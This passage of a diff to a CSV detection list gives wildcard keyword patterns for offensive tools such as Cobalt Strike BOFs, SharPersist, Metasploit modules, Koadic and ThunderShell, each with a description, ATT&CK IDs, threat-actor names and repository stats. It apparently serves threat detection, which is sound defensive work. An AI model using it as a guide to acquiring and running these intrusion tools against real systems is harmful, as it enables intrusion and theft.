T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*schtask_callback*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" -"*SchTaskBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"*schtasks_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*schtasks_exploit *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*schtasksabuse.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*SchTaskBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*schtasks_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*schtasks_exploit *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*schtasksabuse.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*SchTasksImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*schtquery * full*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*screen_spy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*screen_spy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*screengrab.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*screenshot_inject *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*screenspy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*screenspy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Screetsec*","offensive_tool_keyword","Github Username","github username hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*screetsec/Microsploit*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "*screetsec/Pateensy*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" -"*screetsec/Sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*screetsec/Sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" "*screetsec/Vegile*","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*--script broadcast-dhcp-discover*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*script/xor-bin.py*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" -"*scripthost_uac_bypass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*scripthost_uac_bypass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*scripts*Remote-WmiExecute.*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*scripts*Search-EventForUser.ps1*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ScriptSentry-main.zip*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" @@ -16243,19 +16425,20 @@ "*scshellbof.o*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scshellbofx64*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scumjr*dirtycow-vdso*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*Search cached MSI files in C:/Windows/Installer/*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*search_for_secrets(*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*Search-cpassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*SearchOutlook.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SearchOutlook.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*searchsploit -m *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*searchsploit -x *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*searchsploit_rc*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass 